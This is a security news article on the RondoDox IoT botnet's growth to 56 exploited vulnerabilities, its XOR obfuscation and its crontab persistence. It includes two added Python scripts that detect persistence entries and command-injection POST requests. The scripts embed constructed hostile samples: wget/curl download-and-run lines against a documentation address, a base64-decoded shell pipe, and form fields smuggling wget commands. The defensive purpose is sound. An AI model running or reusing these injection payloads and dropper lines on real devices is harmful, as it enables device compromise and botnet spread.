Key Takeaways
- RondoDox IoT botnet campaign has expanded to exploit 56 vulnerabilities across over 30 vendors.
- Most of the exploited flaws are command injections, with buffer overflows, authentication bypasses and legacy bugs such as Shellshock alongside them; attack volume has risen sharply since mid-2025.
- The malware obfuscates itself with XOR encoding, disguises its traffic as that of popular services, and installs multiple persistence mechanisms on compromised devices.
Escalation of RondoDox Campaign
Security researchers have reported a significant escalation of the RondoDox Internet of Things (IoT) botnet campaign, which now targets 56 vulnerabilities across more than 30 vendors. Initially, the campaign exploited just two flaws: CVE-2024-3721 in TBK DVR devices and CVE-2024-12856 in Four-Faith routers. By mid-2025, active exploitation had been documented globally, and a number of the vulnerabilities in its arsenal have been added to the US Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities catalog.
The botnet operators have adopted an “exploit shotgun” approach: they fire multiple exploits at each target and keep whichever one succeeds. Their arsenal includes 50 command injection flaws, alongside buffer overflow and authentication bypass weaknesses. Notably, legacy vulnerabilities feature prominently in the expanded campaign, among them the decade-old Shellshock bug (CVE-2014-6271).
Trend Micro noted that the first identified RondoDox intrusion occurred on June 15, 2025, exploiting a vulnerability in the TP-Link Archer AX21 router. The flaw was originally demonstrated at Pwn2Own Toronto in December 2022, so its reappearance in attacks more than two years later illustrates how long known issues remain exposed on unpatched devices. The RondoDox malware uses XOR encoding to obfuscate itself and mimics legitimate traffic from popular services to evade detection.
To maintain a foothold on compromised devices, RondoDox sets up several persistence mechanisms, modifying startup files and creating crontab entries. It also terminates competing malware and disrupts the system by renaming critical executables. The campaign is distributed through a loader-as-a-service (LaaS) infrastructure that packages RondoDox alongside other payloads such as Mirai.
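The crontab and startup-file persistence described above is something a responder can hunt for on a suspect device. The script below is an added example written for this page, not code from the article, Trend Micro or CloudSEK; it applies generic heuristics (world-writable staging directories, download-and-execute chains, base64-decoded commands, hidden file names) to crontab and rc-style text, and the two sample files are constructed for illustration rather than captured from a real infection.

```python
"""Audit crontab and startup-file text for botnet-style persistence (added example)."""
from __future__ import annotations

import re

# Where IoT malware typically stages itself: world-writable, often tmpfs-backed.
STAGING_DIRS = re.compile(r"(?<![\w/])/(?:tmp|var/tmp|dev/shm)(?=/|\s|$)")
# Fetch-then-run one-liners: wget/curl/tftp piped to a shell or followed by chmod +x / sh.
DOWNLOAD_EXEC = re.compile(r"\b(?:wget|curl|tftp)\b.*?(?:\|\s*(?:sh|bash)\b|;\s*(?:sh|bash|chmod\s+\+x))")
# Commands hidden behind base64 decoding.
BASE64_DECODE = re.compile(r"base64\s+(?:-d|--decode)\b")
# Dot-prefixed path components, a cheap way to hide droppers from casual `ls`.
HIDDEN_NAME = re.compile(r"/\.[A-Za-z0-9_-]+")


def score_command(cmd: str) -> list[str]:
    """Return the sorted list of heuristic names that fire on one shell command."""
    checks = {
        "staging-dir": STAGING_DIRS,
        "download-exec": DOWNLOAD_EXEC,
        "base64-decode": BASE64_DECODE,
        "hidden-name": HIDDEN_NAME,
    }
    return sorted(name for name, rx in checks.items() if rx.search(cmd))


def audit_crontab(text: str) -> list[tuple[str, list[str]]]:
    """Return (line, reasons) for user-crontab lines whose command looks suspicious.

    Handles the five time fields and @reboot/@hourly style shortcuts; skips comments
    and VAR=value lines. (/etc/crontab has an extra user field and is not parsed here.)
    """
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split(None, 1) if line.startswith("@") else line.split(None, 5)
        if len(fields) < (2 if line.startswith("@") else 6):
            continue  # malformed entry, nothing to score
        reasons = score_command(fields[-1])
        if reasons:
            findings.append((line, reasons))
    return findings


def audit_startup(text: str) -> list[tuple[str, list[str]]]:
    """Same scoring for rc.local / init-script style files where each line is a command."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        reasons = score_command(line)
        if reasons:
            findings.append((line, reasons))
    return findings


# Constructed samples (not real captures); 192.0.2.10 is a documentation address.
CRONTAB = """\
# constructed sample
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/bin:/bin
0 3 * * * /usr/bin/find /var/log -name '*.gz' -mtime +30 -delete
@reboot /tmp/.x/run.sh
*/5 * * * * wget -q http://192.0.2.10/bins/arm7 -O /dev/shm/.a; chmod +x /dev/shm/.a; /dev/shm/.a
"""

RC_LOCAL = """\
#!/bin/sh
# constructed sample
/usr/sbin/ntpd -p pool.ntp.org
(cd /tmp && curl -s http://192.0.2.10/x.sh | sh) &
echo Y2QgL3RtcA== | base64 -d | sh
exit 0
"""

if __name__ == "__main__":
    for source, findings in (("crontab", audit_crontab(CRONTAB)), ("rc.local", audit_startup(RC_LOCAL))):
        for line, reasons in findings:
            print(f"[{source}] {', '.join(reasons)}: {line}")
```

On a live device, feed it `crontab -l` output for each user plus the contents of /etc/rc.local, /etc/init.d/ and any /etc/cron.* directories, and treat a hit as a lead to verify by hand rather than a verdict; the legitimate log-rotation entry in the sample shows why plain path matching on /var would be too noisy.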
CloudSEK researchers measured a 230 percent increase in attack attempts from July to August 2025. The operator panel issues commands through dedicated modules that stage the injection and deliver the payload. The attacks themselves target command injection through inadequately sanitized POST parameters in the web interfaces of routers and other embedded devices.
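Because the exploitation step is command injection through POST parameters, a defender with request-level visibility (a reverse proxy, an IDS with HTTP reassembly, or a honeypot in front of embedded-device web interfaces) can flag the attempts before looking at any particular CVE. The following is an added example written for this page, not the article's or either vendor's code: it decodes form bodies, applies a second URL-decode to catch double encoding, and flags values that combine shell breakout characters with loader vocabulary. The four raw requests, the CGI paths and the 192.0.2.x addresses are constructed for illustration, not taken from observed RondoDox traffic.

```python
"""Flag command-injection attempts in web-form POST bodies (added example)."""
from __future__ import annotations

from urllib.parse import parse_qs, unquote_plus
import re

# Characters that let a parameter value escape the command it is interpolated into.
SHELL_BREAKOUT = re.compile(r"[;|`\n]|&&|\$\(|\$\{")
# Fetch/execute vocabulary typical of IoT loader one-liners.
LOADER_WORDS = re.compile(r"\b(?:wget|curl|tftp|busybox|chmod|nohup|sh|bash)\b", re.IGNORECASE)
# World-writable staging directories used to drop the payload.
STAGING = re.compile(r"/(?:tmp|var/tmp|dev/shm)\b")


def scan_form_body(body: str) -> dict[str, list[str]]:
    """Return {param: [reasons]} for form fields whose decoded value looks like injection."""
    findings: dict[str, list[str]] = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for raw in values:
            # parse_qs already decoded once; a second pass exposes double-encoded payloads
            # (it can also mangle a legitimate literal '%xx', so this is a heuristic).
            value = unquote_plus(raw)
            reasons = [
                label
                for label, rx in (
                    ("shell-metachar", SHELL_BREAKOUT),
                    ("loader-vocab", LOADER_WORDS),
                    ("staging-dir", STAGING),
                )
                if rx.search(value)
            ]
            if reasons:
                findings[name] = reasons
    return findings


def parse_request(raw: str) -> tuple[str, str, str]:
    """Split a raw HTTP/1.1 request into (method, path, body); headers are not needed here."""
    head, _, body = raw.partition("\r\n\r\n")
    method, path, _version = head.split("\r\n", 1)[0].split(" ", 2)
    return method, path, body


def triage(requests: list[str]) -> list[tuple[str, dict[str, list[str]]]]:
    """Return (path, findings) for every POST whose body trips the heuristics."""
    alerts = []
    for raw in requests:
        method, path, body = parse_request(raw)
        if method != "POST":
            continue
        hits = scan_form_body(body)
        if hits:
            alerts.append((path, hits))
    return alerts


# Constructed sample requests (not real captures). 192.0.2.0/24 is a documentation range.
REQUESTS = [
    # Benign: an administrator saving an NTP server through the router UI.
    "POST /cgi-bin/ntp.cgi HTTP/1.1\r\nHost: 192.0.2.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "ntp_server=pool.ntp.org&timezone=UTC",
    # Injection: ';' ends the intended command, then a dropper is fetched into /tmp and run.
    "POST /cgi-bin/ntp.cgi HTTP/1.1\r\nHost: 192.0.2.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "ntp_server=pool.ntp.org%3Bwget+http%3A%2F%2F192.0.2.10%2Fa+-O+%2Ftmp%2Fa%3Bsh+%2Ftmp%2Fa&timezone=UTC",
    # Double URL-encoded variant of the same idea against a ping helper.
    "POST /cgi-bin/ping.cgi HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n"
    "host=127.0.0.1%257C%252Fbin%252Fbusybox+wget+http%253A%252F%252F192.0.2.10%252Fb",
    # GET requests carry no form body and are ignored.
    "GET /login.htm HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n",
]

if __name__ == "__main__":
    for path, hits in triage(REQUESTS):
        print(path, hits)
```

The benign request shows the reason for requiring a breakout character or loader word rather than alerting on every odd-looking value; the double-encoded request shows why a single URL-decode is not enough. In production the same scoring can be applied to query strings and JSON bodies, and any hit against a device that has no business running wget or curl from its web interface deserves an immediate look at that device's crontab and startup files.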
The campaign’s reach has also extended to enterprise applications, with exploits for vulnerabilities in Oracle WebLogic servers and known issues in WordPress and vBulletin. RondoDox is built for multiple Linux architectures, which broadens the range of affected devices, including networking equipment from D-Link, Netgear, TP-Link and Cisco as well as several DVR systems.